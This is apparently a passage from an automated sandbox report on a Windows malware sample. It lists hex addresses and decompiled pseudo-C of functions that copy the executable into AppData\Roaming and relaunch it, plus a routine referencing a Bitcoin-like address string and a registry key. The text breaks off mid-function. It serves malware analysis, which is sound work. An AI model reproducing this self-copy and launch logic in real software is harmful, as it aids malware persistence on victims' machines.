0x0042e7e7
0x0042e7ed
0x0042e7ef
0x0042e824
0x0042e829
0x0042e85f
0x0042e85f
0x00000000
0x0042e82b
0x0042e82b
0x0042e830
0x00000000
0x0042e832
0x0042e832
0x0042e834
0x00000000
0x00000000
0x00000000
0x00000000
0x0042e834
0x0042e830
0x0042e7f1
0x0042e7f1
0x0042e81b
0x0042e81b
0x00000000
0x0042e7f3
0x0042e7f3
0x0042e7f5
0x00000000
0x0042e7f7
0x0042e7f7
0x0042e7f9
0x0042e812
0x00000000
0x0042e7fb
0x0042e7fb
0x0042e800
0x0042e856
0x0042e856
0x00000000
0x0042e802
0x0042e802
0x0042e807
0x0042e836
0x0042e83b
0x0042e83d
0x0042e83d
0x0042e840
0x0042e847
0x0042e848
0x0042e84a
0x0042e84f
0x0042e809
0x0042e809
0x0042e866
0x0042e866
0x0042e869
0x0042e870
0x0042e872
0x0042e874
0x0042e87f
0x0042e881
0x0042e883
0x0042e883
0x0042e881
0x0042e88a
0x0042e88c
0x0042e88e
0x0042e895
0x0042e89c
0x0042e89c
0x0042e89c
0x0042e89c
0x0042e8a0
0x0042e8a5
0x0042e8a7
0x0042e8a7
0x0042e8a7
0x0042e8a7
0x0042e8aa
0x0042e8ac
0x0042e8b7
0x0042e8b9
0x0042e8bb
0x0042e8bb
0x0042e8bb
0x0042e8bb
0x0042e8ae
0x0042e8ae
0x0042e8ae
0x0042e8c2
0x0042e8c7
0x0042e8ca
0x0042e8cc
0x0042e8ce
0x0042e8ff
0x0042e915
0x0042e917
0x0042e91a
0x0042e91c
0x0042e98e
0x0042e991
0x0042e997
0x0042e999
0x0042e9df
0x0042e9e2
0x0042e9ea
0x0042e9ed
0x0042e9ef
0x0042e9ef
0x0042e9ef
0x0042e9ef
0x0042e9e4
0x0042e9e4
0x0042e9e4
0x0042e9f8
0x0042ea16
0x0042ea19
0x0042ea1d
0x0042ea27
0x0042ea31
0x0042ea35
0x0042ea38
0x0042ea3b
0x0042ea3b
0x0042ea3b
0x0042ea3f
0x0042ea42
0x0042eac3
0x0042eac3
0x0042eac7
0x00000000
0x0042eacd
0x0042ead7
0x0042eada
0x0042eadf
0x0042eadf
0x0042eae1
0x0042eae8
0x0042eae8
0x0042eae8
0x0042eae3
0x0042eae3
0x0042eae3
0x0042eae1
0x0042eaee
0x0042eaf0
0x0042eaf2
0x0042eb38
0x0042eaf4
0x0042eaf4
0x0042eaf9
0x0042eb24
0x0042eb2e
0x0042eb30
0x00000000
0x00000000
0x0042eafb
0x0042eafb
0x0042eb00
0x00000000
0x0042eb02
0x0042eb02
0x0042eb07
0x0042eb32
0x0042eb32
0x0042eb09
0x0042eb09
0x0042eb0e
0x00000000
0x0042eb10
0x0042eb10
0x0042eb15
0x0042eb1e
0x0042eb1e
0x0042eb17
0x0042eb17
0x0042eb1c
0x00000000
0x00000000
0x0042eb1c
0x0042eb15
0x0042eb0e
0x0042eb07
0x0042eb00
0x0042eaf9
0x0042eb3c
0x0042eb43
0x00000000
0x0042eb49
0x0042eb4b
0x0042eb4f
0x0042eb52
0x00000000
0x0042eb58
0x0042eb60
0x0042eb62
0x0042eb67
0x0042ec1d
0x0042ec20
0x0042ec22
0x00000000
0x0042ec28
0x0042ec28
0x0042ec2b
0x00000000
0x0042ec31
0x0042ec31
0x0042ec34
0x00000000
0x0042ec3a
0x0042ec40
0x0042ec45
0x0042ec48
0x0042ec4a
0x00000000
0x0042ec50
0x0042ec5d
0x0042ec5d
0x00000000
0x0042ec5d
0x0042ec4a
0x0042ec34
0x0042ec2b
0x0042eb6d
0x0042eb6d
0x0042eb72
0x0042ebe5
0x0042ebed
0x0042ebf5
0x0042ebf7
0x00000000
0x0042ebfd
0x0042ebfd
0x0042ec00
0x0042ec6c
0x0042ec6f
0x0042ec74
0x0042ec79
0x0042ec95
0x0042ec9a
0x00000000
0x0042ec9c
0x0042eca1
0x0042eca9
0x0042ecab
0x00000000
0x0042ecb1
0x0042ecb1
0x00000000
0x0042ecb1
0x0042ecab
0x0042ec7b
0x0042ec7d
0x0042ec83
0x0042ec8a
0x0042ec8b
0x0042ec8d
0x0042ec8d
0x0042ec02
0x0042ec02
0x0042ec05
0x0042ecb7
0x0042ecbb
0x0042ec5f
0x0042ec5f
0x0042ec61
0x00000000
0x0042ec67
0x00000000
0x0042ec67
0x0042ec0b
0x0042ec0b
0x0042ec12
0x00000000
0x0042ec14
0x0042ec14
0x00000000
0x0042ec14
0x0042ec12
0x0042ec05
0x0042ec00
0x0042eb74
0x0042eb74
0x0042eb76
0x00000000
0x0042eb7c
0x0042eb7c
0x0042eb7f
0x0042eb81
0x00000000
0x0042eb87
0x0042eb87
0x0042eb8a
0x0042eb9a
0x0042eb9e
0x0042eba0
0x0042eba0
0x0042eba1
0x0042ecc5
0x0042eccc
0x00000000
0x0042eba7
0x0042eba7
0x0042eba8
0x00000000
0x0042ebae
0x0042ebae
0x0042ebb5
0x0042ecce
0x0042ecce
0x0042eccf
0x0042ecd3
0x0042ecd8
0x0042ecd9
0x0042ecdb
0x0042ece0
0x0042ece3
0x0042ece6
0x00000000
0x00000000
0x0042ecec
0x0042ecee
0x0042ecf0
0x00000000
0x0042ecf2
0x0042ecf2
0x0042ecf2
0x00000000
0x0042ecf2
0x00000000
0x0042ecf0
0x00000000
0x0042eccf
0x0042eba8
0x0042eb8c
0x0042eb8c
0x0042eb8f
0x0042ebc2
0x0042ebc7
0x0042ebca
0x0042ebcc
0x00000000
0x0042ebce
0x0042ebd3
0x0042ebda
0x0042ebdd
0x0042ebdf
0x00000000
0x00000000
0x00000000
0x00000000
0x0042ebdf
0x0042eb91
0x0042eb91
0x0042eb91
0x0042eb94
0x00000000
0x00000000
0x00000000
0x00000000
0x0042eb94
0x0042eb8f
0x0042eb8a
0x0042eb81
0x0042eb76
0x0042eb72
0x0042eb67
0x0042eb52
0x0042eb43
0x0042ea44
0x0042ea44
0x0042ea47
0x0042ecf5
0x0042ecf5
0x0042ed09
0x0042ed15
0x0042ed17
0x0042ed2b
0x0042ed3f
0x0042ed43
0x0042ed45
0x0042ed47
0x0042ed4b
0x0042ed4d
0x0042ed61
0x0042ed61
0x0042ed65
0x0042ed65
0x0042ed65
0x0042ed4b
0x0042ed72
0x0042ed74
0x0042ed76
0x0042ed7a
0x0042ed7f
0x0042ed9f
0x0042eda5
0x0042eda7
0x0042eddd
0x0042edee
0x0042edee
0x0042edf1
0x0042eda9
0x0042edb0
0x0042edb5
0x0042edc9
0x0042edcd
0x0042edd2
0x00000000
0x0042edd7
0x0042eda7
0x0042ed7a
0x0042ea4d
0x0042ea4d
0x0042ea51
0x00000000
0x0042ea53
0x0042ea58
0x0042ea5d
0x0042ea5f
0x0042ea62
0x0042ea64
0x0042ea7f
0x0042ea8b
0x0042ea90
0x0042ea93
0x0042ea95
0x0042eab1
0x0042eab7
0x0042eabc
0x0042eabf
0x0042eac1
0x00000000
0x00000000
0x00000000
0x00000000
0x0042ea97
0x0042ea97
0x0042ea9c
0x00000000
0x0042ea9e
0x0042eaa0
0x0042eaa5
0x0042eaaa
0x0042eaad
0x0042eaaf
0x00000000
0x00000000
0x00000000
0x00000000
0x0042eaaf
0x0042ea9c
0x0042ea66
0x0042ea66
0x0042ea6b
0x0042ea71
0x00000000
0x0042ea73
0x0042ea73
0x0042ea75
0x00000000
0x0042ea75
0x0042ea71
0x0042ea64
0x0042ea51
0x0042ea47
0x0042e99b
0x0042e9b3
0x0042e9bc
0x0042e9bf
0x0042e9c8
0x0042e9ce
0x0042e9d0
0x0042e9d7
0x0042e9d7
0x00000000
0x0042e9d0
0x0042e91e
0x0042e928
0x0042e92a
0x0042e957
0x0042e96b
0x0042e96f
0x0042e96f
0x0042e979
0x0042e97e
0x0042e97f
0x0042e986
0x0042e92c
0x0042e92c
0x0042e930
0x00000000
0x0042e932
0x0042e932
0x0042e94e
0x0042e950
0x0042e953
0x0042e955
0x00000000
0x00000000
0x00000000
0x00000000
0x0042e955
0x0042e930
0x0042e92a
0x0042edf4
0x0042edf4
0x0042e8d0
0x0042e8d5
0x0042e8d8
0x0042e8df
0x0042e8ea
0x0042e8ea
0x0042e8ce
0x0042e807
0x0042e800
0x0042e7f9
0x0042e7f5
0x0042e7f1
0x0042e851
0x0042e7ad
0x0042e7a8
0x0042e7a4
0x0042e7a0
0x0042e74e
0x0042e74e
0x0042e74f
0x0042e779
0x0042e77d
0x0042e788
0x0042e788
0x0042e77f
0x0042e77f
0x0042e786
0x00000000
0x00000000
0x00000000
0x00000000
0x0042e786
0x00000000
0x0042e751
0x0042e751
0x0042e752
0x0042e774
0x0042e774
0x00000000
0x0042e754
0x0042e754
0x0042e759
0x0042e75b
0x0042e75e
0x0042e765
0x0042e766
0x0042e768
0x0042e76d
0x0042e76d
0x0042e752
0x0042e74f
0x0042e855
0x0042e855

Strings

@, xrefs: 0042EB4B
H, xrefs: 0042EA3B

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0041FAE0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109

C-Code - Quality: 87%

			E0041FAE0(void* __ebx, void* __eflags) {
				signed int _v8;
				char _v28;
				char _v8218;
				short _v8220;
				struct _STARTUPINFOW _v8292;
				struct _PROCESS_INFORMATION _v8308;
				void* __edi;
				void* __esi;
				signed int _t21;
				void* _t29;
				long _t30;
				int _t40;
				signed int _t63;
				void* _t64;
				void* _t66;
				void* _t67;

				E0042E220(0x2070);
				_t21 =  *0x43f054; // 0xd6baf341
				_v8 = _t21 ^ _t63;
				_v8220 = 0;
				E0042D0A0( &_v8218, 0, 0x1ffe);
				E004233D0( &_v28, 5); // executed
				_push(PathFindFileNameW("C:\Users\admin\AppData\Roaming\amhfnhe45.exe"));
				E00414300(0x1000,  &_v8220, L"%s\\%s", "C:\Users\admin\AppData\Roaming");
				_t66 = _t64 + 0x24;
				_t29 = CreateFileW( &_v8220, 0x80000000, 1, 0, 3, 0, 0); // executed
				_t61 = _t29;
				_t30 = GetLastError();
				_t59 = _t30;
				CloseHandle(_t29);
				if(_t30 != 2) {
					__eflags = 0;
					return E004256FE(0, __ebx, _v8 ^ _t63, 0x1000, _t59, _t61);
				} else {
					_push( &_v28);
					E00414300(0x1000,  &_v8220, L"%s\\%she45.exe", "C:\Users\admin\AppData\Roaming");
					_t67 = _t66 + 0x10;
					do {
						CopyFileW("C:\Users\admin\AppData\Roaming\amhfnhe45.exe",  &_v8220, 0);
						E0042D0A0( &_v8292, 0, 0x44);
						_t67 = _t67 + 0xc;
						_v8292.wShowWindow = 1;
						_v8292.dwFlags = 1;
						_v8292.cb = 0x44;
						_t40 = CreateProcessW(0,  &_v8220, 0, 0, 0, 0x20, 0, 0,  &_v8292,  &_v8308);
						_t70 = _t40;
					} while (_t40 == 0);
					E0041FC50(__ebx,  &_v8292, CreateProcessW, CopyFileW, _t70);
					return E004256FE(1, __ebx, _v8 ^ _t63,  &_v8292, CreateProcessW, CopyFileW);
				}
			}

APIs

Part of subcall function 004233D0: GetTickCount.KERNEL32(?,?,?,?,0041386B,00442000,00000003), ref: 004233E1
Part of subcall function 004233D0: Sleep.KERNELBASE(0000000F), ref: 00423417

PathFindFileNameW.SHLWAPI(C:\Users\admin\AppData\Roaming\amhfnhe45.exe), ref: 0041FB29
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0041FB64
GetLastError.KERNEL32(?,?,?,?,?,00000000,76F85660,?,0041F500), ref: 0041FB6C
CloseHandle.KERNEL32(00000000), ref: 0041FB75
CopyFileW.KERNEL32(C:\Users\admin\AppData\Roaming\amhfnhe45.exe,?,00000000), ref: 0041FBC0
CreateProcessW.KERNEL32 ref: 0041FC14

Part of subcall function 0041FC50: GetShortPathNameW.KERNEL32(?,?,00001000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041FCA1

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Strings

C:\Users\admin\AppData\Roaming\amhfnhe45.exe, xrefs: 0041FB24, 0041FBBB
D, xrefs: 0041FC0A
C:\Users\admin\AppData\Roaming, xrefs: 0041FB30, 0041FB88
%s\%s, xrefs: 0041FB3B
%s\%she45.exe, xrefs: 0041FB93

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 0042C826, Relevance: 18.5, APIs: 12, Instructions: 494

C-Code - Quality: 90%

			E0042C826(void* __ebx, signed int __edx, long _a4, long _a8, signed int _a12) {
				signed int _v8;
				char _v15;
				void _v16;
				short _v1724;
				char _v5140;
				void _v6844;
				short _v6848;
				long _v6852;
				signed int _v6853;
				long _v6860;
				long _v6864;
				int _v6868;
				long _v6872;
				long _v6876;
				long _v6880;
				long _v6884;
				signed int _v6888;
				void* __edi;
				void* __esi;
				signed int _t209;
				long _t211;
				intOrPtr _t214;
				long _t215;
				intOrPtr _t216;
				long _t217;
				signed int _t225;
				signed int* _t230;
				long _t242;
				long _t245;
				signed int* _t246;
				long _t252;
				long _t253;
				signed int* _t256;
				long _t262;
				long _t263;
				void* _t267;
				long _t271;
				int _t272;
				long _t274;
				void* _t275;
				short _t277;
				void* _t278;
				void* _t282;
				long _t284;
				void* _t286;
				int _t293;
				int _t300;
				void* _t304;
				intOrPtr* _t313;
				long _t314;
				signed int _t315;
				signed short* _t316;
				signed int _t317;
				long _t318;
				signed short* _t319;
				long _t331;
				long _t335;
				long _t337;
				char _t341;
				signed int _t352;
				long _t355;
				void* _t356;
				void* _t357;
				long _t359;
				signed int _t361;
				void* _t362;

				_t350 = __edx;
				_t312 = __ebx;
				E0042E220(0x1ae4);
				_t209 =  *0x43f054; // 0xd6baf341
				_v8 = _t209 ^ _t361;
				_t211 = _a8;
				_t355 = _a4;
				_t352 = 0;
				_v6864 = _t211;
				_v6860 = 0;
				_v6868 = 0;
				if(_a12 != 0) {
					__eflags = _t211;
					if(__eflags != 0) {
						_push(__ebx);
						_t313 = 0x482280 + (_t355 >> 5) * 4;
						_t214 =  *_t313;
						_t352 = (_t355 & 0x0000001f) << 6;
						_t322 =  *((intOrPtr*)(_t214 + _t352 + 0x24)) +  *((intOrPtr*)(_t214 + _t352 + 0x24)) >> 1;
						_v6880 = _t313;
						_v6853 = _t322;
						__eflags = _t322 - 2;
						if(_t322 == 2) {
							L6:
							_t322 =  !_a12;
							__eflags =  !_a12 & 0x00000001;
							if(__eflags != 0) {
								L8:
								__eflags =  *(_t214 + _t352 + 4) & 0x00000020;
								if(( *(_t214 + _t352 + 4) & 0x00000020) != 0) {
									E0042C6B7(_t322, _t355, 0, 0, 2);
									_t362 = _t362 + 0x10;
								}
								_t215 = E0042D042(_t355);
								__eflags = _t215;
								if(_t215 == 0) {
									L45:
									_t325 = 0;
									__eflags = 0;
									goto L46;
								} else {
									__eflags =  *(_t352 +  *_t313 + 4) & 0x00000080;
									if(__eflags == 0) {
										goto L45;
									}
									_t267 = E0042AA05(_t313, __eflags);
									__eflags =  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14);
									_t355 = 0 |  *( *((intOrPtr*)(_t267 + 0x6c)) + 0x14) == 0x00000000;
									_t271 = GetConsoleMode( *(_t352 +  *_t313),  &_v6884);
									_t325 = 0;
									__eflags = _t271;
									if(_t271 == 0) {
										L46:
										_t216 =  *_t313;
										__eflags =  *(_t216 + _t352 + 4) & 0x00000080;
										if(( *(_t216 + _t352 + 4) & 0x00000080) == 0) {
											_t217 = WriteFile( *(_t216 + _t352), _v6864, _a12,  &_v6876, _t325);
											__eflags = _t217;
											if(_t217 == 0) {
												L85:
												_v6848 = GetLastError();
												L86:
												__eflags = _v6860;
												if(_v6860 != 0) {
													_t220 = _v6860 - _v6868;
													__eflags = _v6860 - _v6868;
													L97:
													_pop(_t312);
													L98:
													return E004256FE(_t220, _t312, _v8 ^ _t361, _t350, _t352, _t355);
												}
												L87:
												__eflags = _v6848;
												if(_v6848 == 0) {
													L91:
													__eflags =  *(_t352 +  *_v6880 + 4) & 0x00000040;
													if(__eflags == 0) {
														L94:
														 *((intOrPtr*)(E00427125(__eflags))) = 0x1c;
														_t225 = E00427138(__eflags);
														 *_t225 =  *_t225 & 0x00000000;
														__eflags =  *_t225;
														L95:
														_t220 = _t225 | 0xffffffff;
														goto L97;
													}
													__eflags =  *_v6864 - 0x1a;
													if(__eflags != 0) {
														goto L94;
													}
													_t220 = 0;
													goto L97;
												}
												_t355 = 5;
												__eflags = _v6848 - _t355;
												if(__eflags != 0) {
													_t225 = E0042714B(_v6848);
												} else {
													 *((intOrPtr*)(E00427125(__eflags))) = 9;
													_t225 = E00427138(__eflags);
													 *_t225 = _t355;
												}
												goto L95;
											}
											_v6848 = _v6848 & 0x00000000;
											_v6860 = _v6876;
											goto L86;
										}
										__eflags = _v6853;
										_v6848 = _t325;
										if(_v6853 != 0) {
											__eflags = _v6853 - 2;
											if(_v6853 != 2) {
												_v6872 = _v6864;
												__eflags = _a12 - _t325;
												if(_a12 <= _t325) {
													goto L91;
												} else {
													goto L70;
												}
												do {
													L70:
													_v6852 = _v6852 & 0x00000000;
													_t331 = _v6872 - _v6864;
													__eflags = _t331;
													_t230 =  &_v1724;
													_t356 = 2;
													do {
														__eflags = _t331 - _a12;
														if(_t331 >= _a12) {
															break;
														}
														_t350 =  *_v6872 & 0x0000ffff;
														_v6872 = _v6872 + _t356;
														_t331 = _t331 + _t356;
														__eflags = _t350 - 0xa;
														if(_t350 == 0xa) {
															_t315 = 0xd;
															 *_t230 = _t315;
															_t230 = _t230 + _t356;
															_t167 =  &_v6852;
															 *_t167 = _v6852 + _t356;
															__eflags =  *_t167;
														}
														_v6852 = _v6852 + _t356;
														 *_t230 = _t350;
														_t230 = _t230 + _t356;
														__eflags = _v6852 - 0x6a8;
													} while (_v6852 < 0x6a8);
													_t355 = 0;
													asm("cdq");
													_t314 = WideCharToMultiByte(0xfde9, 0,  &_v1724, _t230 -  &_v1724 - _t350 >> 1,  &_v5140, 0xd55, 0, 0);
													__eflags = _t314;
													if(_t314 == 0) {
														goto L85;
													} else {
														goto L76;
													}
													while(1) {
														L76:
														_t242 = WriteFile( *(_t352 +  *_v6880), _t361 + _t355 - 0x1410, _t314 - _t355,  &_v6876, 0);
														__eflags = _t242;
														if(_t242 == 0) {
															break;
														}
														_t355 = _t355 + _v6876;
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															continue;
														}
														L80:
														__eflags = _t314 - _t355;
														if(_t314 > _t355) {
															goto L86;
														}
														goto L81;
													}
													_v6848 = GetLastError();
													goto L80;
													L81:
													_t245 = _v6872 - _v6864;
													_v6860 = _t245;
													__eflags = _t245 - _a12;
												} while (_t245 < _a12);
												goto L86;
											}
											_t316 = _v6864;
											__eflags = _a12 - _t325;
											if(_a12 <= _t325) {
												goto L91;
											} else {
												goto L60;
											}
											do {
												L60:
												_v6852 = _v6852 & 0x00000000;
												_t335 = _t316 - _v6864;
												__eflags = _t335;
												_t246 =  &_v6844;
												_t357 = 2;
												do {
													__eflags = _t335 - _a12;
													if(_t335 >= _a12) {
														break;
													}
													_t350 =  *_t316 & 0x0000ffff;
													_t316 = _t316 + _t357;
													_t335 = _t335 + _t357;
													_v6884 = _t316;
													__eflags = _t350 - 0xa;
													if(_t350 == 0xa) {
														_v6868 = _v6868 + _t357;
														_t317 = 0xd;
														 *_t246 = _t317;
														_t316 = _v6884;
														_t246 = _t246 + _t357;
														_t140 =  &_v6852;
														 *_t140 = _v6852 + _t357;
														__eflags =  *_t140;
													}
													_v6852 = _v6852 + _t357;
													 *_t246 = _t350;
													_t246 = _t246 + _t357;
													__eflags = _v6852 - 0x13fe;
												} while (_v6852 < 0x13fe);
												_t355 = _t246 -  &_v6844;
												_t252 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0);
												__eflags = _t252;
												if(_t252 == 0) {
													goto L85;
												}
												_t253 = _v6876;
												_v6860 = _v6860 + _t253;
												__eflags = _t253 - _t355;
												if(_t253 < _t355) {
													goto L86;
												}
												__eflags = _t316 - _v6864 - _a12;
											} while (_t316 - _v6864 < _a12);
											goto L86;
										}
										_t318 = _v6864;
										__eflags = _a12 - _t325;
										if(_a12 <= _t325) {
											goto L91;
										} else {
											goto L49;
										}
										do {
											L49:
											_t359 = 0;
											_t337 = _t318 - _v6864;
											__eflags = _t337;
											_t256 =  &_v6844;
											do {
												__eflags = _t337 - _a12;
												if(_t337 >= _a12) {
													break;
												}
												_t350 =  *_t318;
												_t318 = _t318 + 1;
												_t337 = _t337 + 1;
												_v6884 = _t318;
												__eflags = _t350 - 0xa;
												if(_t350 == 0xa) {
													_v6868 =  &(_v6868->Internal);
													 *_t256 = 0xd;
													_t256 =  &(_t256[0]);
													_t359 = _t359 + 1;
													__eflags = _t359;
												}
												 *_t256 = _t350;
												_t256 =  &(_t256[0]);
												_t359 = _t359 + 1;
												__eflags = _t359 - 0x13ff;
											} while (_t359 < 0x13ff);
											_t355 = _t256 -  &_v6844;
											_t262 = WriteFile( *(_t352 +  *_v6880),  &_v6844, _t355,  &_v6876, 0); // executed
											__eflags = _t262;
											if(_t262 == 0) {
												goto L85;
											}
											_t263 = _v6876;
											_v6860 = _v6860 + _t263;
											__eflags = _t263 - _t355;
											if(_t263 < _t355) {
												goto L86;
											}
											__eflags = _t318 - _v6864 - _a12;
										} while (_t318 - _v6864 < _a12);
										goto L86;
									}
									__eflags = _t355;
									if(_t355 == 0) {
										L15:
										_t272 = GetConsoleCP();
										_t319 = _v6864;
										_v6884 = _t272;
										_v6872 = 0;
										__eflags = _a12;
										if(_a12 <= 0) {
											goto L87;
										}
										_v6852 = 0;
										do {
											_t274 = _v6853;
											__eflags = _t274;
											if(_t274 != 0) {
												__eflags = _t274 - 1;
												if(_t274 == 1) {
													L35:
													_t355 =  *_t319 & 0x0000ffff;
													__eflags = _t355 - 0xa;
													_t325 = 0 | _t355 == 0x0000000a;
													_t319 =  &(_t319[1]);
													_t81 =  &_v6852;
													 *_t81 = _v6852 + 2;
													__eflags =  *_t81;
													_v6848 = _t355;
													_v6888 = _t355 == 0xa;
													L36:
													__eflags = _t274 - 1;
													if(_t274 == 1) {
														L38:
														_t275 = E0042F6BE(_t325, _v6848);
														_pop(_t325);
														__eflags = _t275 - _v6848;
														if(_t275 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 2;
														__eflags = _v6888;
														if(_v6888 == 0) {
															goto L42;
														}
														_t277 = 0xd;
														_v6848 = _t277;
														_t278 = E0042F6BE(_t325, _t277);
														_pop(_t325);
														__eflags = _t278 - _v6848;
														if(_t278 != _v6848) {
															goto L85;
														}
														_v6860 = _v6860 + 1;
														_t94 =  &_v6868;
														 *_t94 =  &(_v6868->Internal);
														__eflags =  *_t94;
														goto L42;
													}
													__eflags = _t274 - 2;
													if(_t274 != 2) {
														goto L42;
													}
													goto L38;
												}
												__eflags = _t274 - 2;
												if(_t274 != 2) {
													goto L36;
												}
												goto L35;
											}
											_t341 =  *_t319;
											_t355 = _v6880;
											__eflags = _t341 - 0xa;
											_v6888 = 0 | _t341 == 0x0000000a;
											_t282 =  *_t355 + _t352;
											__eflags =  *(_t282 + 0x38);
											if( *(_t282 + 0x38) == 0) {
												_t284 = E0042D435(_t341);
												__eflags = _t284;
												if(_t284 == 0) {
													_push(1);
													_push(_t319);
													L25:
													_push( &_v6848);
													_t286 = E0042D9C9();
													_t362 = _t362 + 0xc;
													__eflags = _t286 - 0xffffffff;
													if(_t286 == 0xffffffff) {
														goto L86;
													}
													L26:
													_t319 =  &(_t319[0]);
													_v6852 = _v6852 + 1;
													_t355 = WideCharToMultiByte(_v6884, 0,  &_v6848, 1,  &_v16, 5, 0, 0);
													__eflags = _t355;
													if(_t355 == 0) {
														goto L86;
													}
													_t293 = WriteFile( *(_t352 +  *_v6880),  &_v16, _t355,  &_v6872, 0);
													__eflags = _t293;
													if(_t293 == 0) {
														goto L85;
													}
													_t325 = _v6868;
													_v6860 = _v6852 + _v6868;
													__eflags = _v6872 - _t355;
													if(_v6872 < _t355) {
														goto L86;
													}
													__eflags = _v6888;
													if(_v6888 == 0) {
														goto L42;
													}
													_v16 = 0xd;
													_t300 = WriteFile( *(_t352 +  *_v6880),  &_v16, 1,  &_v6872, 0);
													__eflags = _t300;
													if(_t300 == 0) {
														goto L85;
													}
													__eflags = _v6872 - 1;
													if(_v6872 < 1) {
														goto L86;
													}
													_v6868 =  &(_v6868->Internal);
													_v6860 = _v6860 + 1;
													goto L42;
												}
												__eflags = _v6864 - _t319 + _a12 - 1;
												if(_v6864 - _t319 + _a12 <= 1) {
													_t350 =  *_t319;
													_v6860 = _v6860 + 1;
													 *((char*)(_t352 +  *_t355 + 0x34)) =  *_t319;
													 *((intOrPtr*)(_t352 +  *_t355 + 0x38)) = 1;
													goto L86;
												}
												_t304 = E0042D9C9( &_v6848, _t319, 2);
												_t362 = _t362 + 0xc;
												__eflags = _t304 - 0xffffffff;
												if(_t304 == 0xffffffff) {
													goto L86;
												}
												_t319 =  &(_t319[0]);
												_v6852 = _v6852 + 1;
												goto L26;
											}
											_t350 =  *((intOrPtr*)(_t282 + 0x34));
											_v16 =  *((intOrPtr*)(_t282 + 0x34));
											_v15 = _t341;
											 *(_t282 + 0x38) =  *(_t282 + 0x38) & 0x00000000;
											_push(2);
											_push( &_v16);
											goto L25;
											L42:
											__eflags = _v6852 - _a12;
										} while (_v6852 < _a12);
										goto L86;
									}
									__eflags = _v6853;
									if(_v6853 == 0) {
										goto L46;
									}
									goto L15;
								}
							}
							 *(E00427138(__eflags)) =  *_t307 & 0x00000000;
							 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
							_t225 = E004270D3();
							goto L95;
						}
						__eflags = _t322 - 1;
						if(_t322 != 1) {
							goto L8;
						}
						goto L6;
					}
					 *(E00427138(__eflags)) = 0;
					 *((intOrPtr*)(E00427125(__eflags))) = 0x16;
					_t220 = E004270D3() | 0xffffffff;
					goto L98;
				}
				_t220 = 0;
				goto L98;
			}

APIs

GetConsoleMode.KERNEL32(00000000,?), ref: 0042C936
GetConsoleCP.KERNEL32 ref: 0042C956
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,004257B7,00000005,00000000,00000000), ref: 0042CA46
WriteFile.KERNEL32(00000000,004257B7,00000000,?,00000000), ref: 0042CA6F
WriteFile.KERNEL32(00000000,004257B7,00000001,?,00000000), ref: 0042CAC8

Part of subcall function 0042F6BE: WriteConsoleW.KERNEL32(FFFFFFFE,00000000,00000001,00000000,00000000), ref: 0042F6F0

WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CC36
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CD10
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,00000D55,00000000,00000000), ref: 0042CDE0
WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0042CE11
GetLastError.KERNEL32 ref: 0042CE27
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0042CE68
GetLastError.KERNEL32(?,0042CFB8,00000000,004257B7,?,0043C368,00000010,00426F28,004257B7,00000000,00000001,?,00000000,00000000), ref: 0042CE87

Part of subcall function 004256FE: IsDebuggerPresent.KERNEL32 ref: 00426D9A
Part of subcall function 004256FE: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00426DAF
Part of subcall function 004256FE: UnhandledExceptionFilter.KERNEL32(00431324), ref: 00426DBA
Part of subcall function 004256FE: GetCurrentProcess.KERNEL32(C0000409), ref: 00426DD6
Part of subcall function 004256FE: TerminateProcess.KERNEL32(00000000), ref: 00426DDD

Part of subcall function 0042C6B7: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,?,?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001), ref: 0042C6F9
Part of subcall function 0042C6B7: GetLastError.KERNEL32(?,0042C8F9,00000000,00000000,00000000,00000002,00000000,00000001,00000000,?,0042CFB8,00000000,004257B7,?,0043C368,00000010), ref: 0042C706

Memory Dump Source

Source File: 00000001.00000001.229874161.00400000.00000040.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_1_400000_amhfnhe45.jbxd

Function 004010C0, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 103

C-Code - Quality: 15%

			E004010C0(void* __ebx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v135;
				char _v136;
				char _v263;
				char _v264;
				void* _v268;
				int _v272;
				int _v276;
				void* __esi;
				signed int _t25;
				long _t35;
				void* _t46;
				void* _t61;
				void* _t62;
				void* _t64;
				signed int _t69;

				_t61 = __edi;
				_t46 = __ebx;
				_t66 = _t69;
				_t25 =  *0x43f054; // 0xd6baf341
				_v8 = _t25 ^ _t69;
				_v264 = 0;
				E0042D0A0( &_v263, 0, 0x7f);
				_v136 = 0;
				E0042D0A0( &_v135, 0, 0x7f);
				E0042D0A0("149GjgCKkimJLKjmzZumc1Hg6bpdDihTSg", 0, 0x100);
				_v272 = 0x100;
				E00401CE0(0x80,  &_v136, "Software\\%S", "AA6A331C729CA1F");
				if(_a4 == 0) {
